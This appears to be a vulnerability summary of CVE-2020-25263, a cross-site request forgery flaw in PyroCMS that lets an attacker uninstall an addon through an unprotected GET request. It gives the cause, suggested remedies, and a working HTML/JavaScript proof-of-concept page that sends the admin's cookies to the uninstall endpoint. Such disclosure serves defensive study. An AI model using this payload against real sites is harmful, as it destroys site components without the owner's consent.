CVE-2020-25263

An attacker hosts a malicious HTML page that sends a GET request to `/admin/addons/uninstall/anomaly.module.blocks` [ref_id=1]. Because PyroCMS does not verify whether the request was intentionally made by the authenticated user (CSRF), the browser automatically includes the victim's session cookies when the request is sent [CWE-352]. The attacker lures an already-authenticated PyroCMS admin to visit the malicious page via social engineering, and the plugin is deleted on the victim's behalf [ref_id=1].

The advisory [ref_id=1] identifies the vulnerable URI as `/admin/addons/uninstall/anomaly.module.blocks`. The exact source file is not named in the bundle, but the vulnerability lies in the controller handling the uninstall action for addons/modules, which accepts a GET request without CSRF token validation.

No patch is included in the bundle. The advisory [ref_id=1] identifies that the root cause is the use of a GET request for a state-changing action (plugin uninstall) without CSRF protection. The remediation would require the application to either (a) require a CSRF token for the uninstall action, (b) change the HTTP method from GET to POST/DELETE, or (c) implement a confirmation step. The advisory does not specify whether a fix was ever released.

Create a page with the following content and host it on an attacker-controlled server. When an authenticated PyroCMS admin visits the page, the `anomaly.module.blocks` plugin will be deleted without their consent [ref_id=1].

```html <!DOCTYPE> <html> <head> <title></title> <script type="text/javascript"> var url = "http://test.com/admin/addons/uninstall/anomaly.module.blocks" xhr = new XMLHttpRequest(); xhr.open("GET",url); xhr.withCredentials = true; xhr.send(null); </script> </head> </html> ```